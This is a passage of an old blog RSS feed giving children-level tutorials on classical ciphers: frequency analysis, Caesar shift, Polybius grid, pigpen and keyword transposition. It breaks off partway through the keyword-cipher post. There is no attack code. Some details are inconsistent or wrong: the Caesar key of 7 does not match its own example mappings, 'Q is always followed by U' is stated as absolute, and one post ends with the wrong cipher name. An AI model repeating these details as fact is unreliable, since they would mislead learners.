&lt;div class="fb-like" data-href="http://hackrich.blogspot.com/" data-send="true" data-show-faces="true" data-width="450"&gt;&lt;/div&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Breaking Ciphers</title><link>http://hackrich.blogspot.com/2011/09/breaking-ciphers.html</link><category>Breaking Ciphers</category><category>ciphers</category><category>Codes</category><category>coding</category><category>CRYPTANALYSIS</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:47:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-7347320547447830558</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Breaking a cipher&lt;/span&gt;&lt;/b&gt;, &lt;span class="Apple-style-span" style="color: #351c75;"&gt;also known as &lt;/span&gt;&lt;b&gt;CRYPTANALYSIS&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;, without having the key is quite difficult and very time consuming. And, depending on the type of cipher system used to create the secret message, there may be more than one key that cracks the code!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To break a message, it helps to know something about the message.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;&amp;gt;&amp;gt;&lt;/b&gt; Who sent the message? &amp;nbsp; &amp;nbsp;&lt;b&gt;&amp;gt;&amp;gt; &lt;/b&gt;What language is the message written in?&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;&amp;gt;&amp;gt;&lt;/b&gt; Who was it sent to? &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;b&gt; &amp;gt;&amp;gt;&lt;/b&gt; Is there a key word you can look for?&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;After answering these questions, try counting the number of times each letter is used in the message - this is called a &lt;/span&gt;&lt;b&gt;FREQUENCY COUNT&lt;/b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;. Knowing how often letters are used can help you guess which cipher letter equals which plaintext letter. From there you can make other guesses based on language rules.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Today, high level encryption is done with complex mathematics and computers, and the same is needed to break them.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Helpful Hints About the English Language&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Rather than trying to break the cipher randomly with different decryption methods, try using these English factoids the next time you try to break a secret message!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;Letters&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The MOST COMMON letters used in the English language are E, T, N, O, R, I, A, &amp;amp; S.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* More than HALF of all English words end in E, T, D, &amp;amp; S.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* T is the most common FIRST letter of a word.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* E is the most common LAST letter of a word.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* Q is always followed by a "U."&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* There are NO English words that end in "Q" or "J."&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;Words&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* If a letter stands alone in a sentence, it can easily be identified as an "A" or an "I."&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The MOST COMMON word used in the English language is the word "THE."&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The word "STOP" replaces "." at the end of a sentence.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;For example&lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;MEET AT SIX STOP BRING CANDY STOP&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;Doublets&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The MOST COMMON Doublets (when the same letter is used twice in a row) found in the English language are:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;EE, TT, OO, SS, LL, FF&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Examples include:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;EERY ATTIC ROOM STOP ACCESS STILL CUTOFF STOP&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;2-Letter Combos&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The MOST COMMON 2-Letter combinations found in the English language are:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;HE, RE, AN, TH, ER, IN&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Examples include:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;HELP STOP RESEND MAN WITH WATER INSIDE STOP&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;3-Letter Combos&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;* The MOST COMMON 3-Letter combinations found in the English language are:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;ION, AND, ING, THE, ENT&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Examples include:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;UNION DISBANDING STOP TIMING THE DESCENT STOP&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Make A Cipher: Caesar's Shift Cipher</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-caesars-shift-cipher.html</link><category>Caesar's Shift Cipher</category><category>ciphers</category><category>Codes</category><category>coding</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>Make A Cipher</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:38:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-8127243141061014842</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Encrypt a Caesar's Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write down each letter of the alphabet. This is called a Standard Alphabet.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Then select a number that will be used as the KEY.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;For our example, we will use 7 as our Key Number.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Starting with the letter A in your Standard Alphabet, count seven letters to the right and write the letter A underneath the G.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Continue writing the remaining letters of the alphabet until you come to the end of the Standard Alphabet.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Once you have reached the end of the Standard Alphabet, go back to the beginning and write in the remaining six letters.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Now you are ready to encrypt your message!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Locate the first letter from your plaintext in the Standard Alphabet. The letter below it is the cipher letter. Follow this method for each letter.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;For example: B=V, I=C, O=I&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 5&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;There are many different kinds of Caesar Ciphers, or Shift Ciphers, as they are commonly called.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Try using shifted numbers or a key word cipher instead of letters for your next secret message!&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;CONGRATULATIONS!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have created a Number Shift Cipher!&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Make A Cipher: Number Shift Cipher</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-number-shift-cipher.html</link><category>ciphers</category><category>Codes</category><category>coding</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>Make A Cipher</category><category>Number Shift Cipher</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:34:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-4210098788068780681</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Encrypt a Number Shift Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write down your PLAINTEXT message on a piece of paper.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Create a 5x5 grid, also known as a Polybius Grid, on your paper.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Make sure your grid has 25 squares when you are finished.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write the numbers 1 thru 5 down the left side of the grid and across the top of the grid as well.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Beginning with the letter A, fill in the squares with the letters of the alphabet. Because there are only 25 squares, cryptanalysts usually put the letters Y and Z together in the last square.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Begin encrypting your message by locating the first letter of your plaintext message in the grid.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write down the row number followed by the column number.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;In our example, the T will be encrypted as the number 45.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 5&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Continue until your entire message has been encrypted.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To make your message more secure, leave out the spaces between each word.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;CONGRATULATIONS!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have created a Number Shift Cipher!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Decrypt a Number Shift Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Based on the KEY provided by the sender, create a 5x5 grid (Polybius Grid). Label the rows 1 thru 5 down the left side of the grid and the columns 1 thru 5 across the top.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Once you have created the grid, fill in the squares with the letters of the alphabet. Because there are only 25 squares and 26 letters, remember to put Y and Z in the same square at the bottom of the grid.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To begin decrypting the ciphertext, take the first number from the message and examine the number's two digits. The first digit is the row number and the second digit is the column number.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write the letter that appears at the intersection of the specific row and column on the grid.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Continue decrypting the ciphertext until your message is revealed.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;CONGRATULATIONS!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have learned how to decrypt a Number Shift Cipher!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Make A Cipher: One Pig's Pen</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-one-pigs-pen.html</link><category>ciphers</category><category>Codes</category><category>coding</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>Make A Cipher</category><category>One Pig's Pen</category><category>study</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:31:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-2531914482299278288</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Encrypt a Pig Pen Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write down your PLAINTEXT message on a piece of paper. Then draw two tic-tac-toe grids and two big X's - alternating each grid as you draw them on your paper.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;In the last two grids, place a dot in each compartment.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Then, beginning with the first grid, fill in each compartment with a single letter of the alphabet.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To draw the cipher letters, use the shape of the compartment, or the "pen," surrounding the letter itself.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;DO NOT include the letter in the cipher.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Once you have created the cipher, send the message to a friend. Before you send it, make sure your friend knows what the patterns are for the grids and letters.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To make the cipher more secure, try changing the letter and dot patterns inside the compartments.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Decrypt a Pig Pen Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Arrange the grids and letters on a piece of paper according to the KEY that breaks the cipher.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Draw the grids in the correct pattern and then fill in the different compartments, or pens, with the appropriate dots and letters.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Begin decrypting the message by comparing the shape of each cipher letter with the shape of the grid compartments.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Once you find a match, write down the letter that the cipher represents. Continue until you have completed decrypting the entire message.&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>Make A Cipher: The Key</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-key.html</link><category>ciphers</category><category>Codes</category><category>coding</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>Make A Cipher</category><category>study</category><category>The Key</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:28:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-5018757418878625360</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Encrypt a Key Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Choose a word to be your KEY word. Make sure the word you select has at least five or six letters in it and has no repeating letters. For example the word APPLE will not work with this cipher because there are two P's in the word. In our example, we will use the word MAPLE for our key.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write the Key word on a piece of paper. Leave a little bit of space between each letter as you write down each letter of your Key.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Next, draw a column under each letter of the Key word.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Fill in the columns by writing your PLAINTEXT message one letter at a time.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Any empty spaces should be filled in with a NULL. A NULL is usually represented by the letter X.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 4&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Rewrite the columns so that the letters in your Key word are in alphabetical order.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;In our example, the word MAPLE will be rearranged to read AELMP.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 5&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;To see your encrypted message, copy the letters in each column from top to bottom, but DO NOT include the letters in the Key word.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;CONGRATULATIONS!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have successfully created a KEY CIPHER!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Decrypt a Key Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
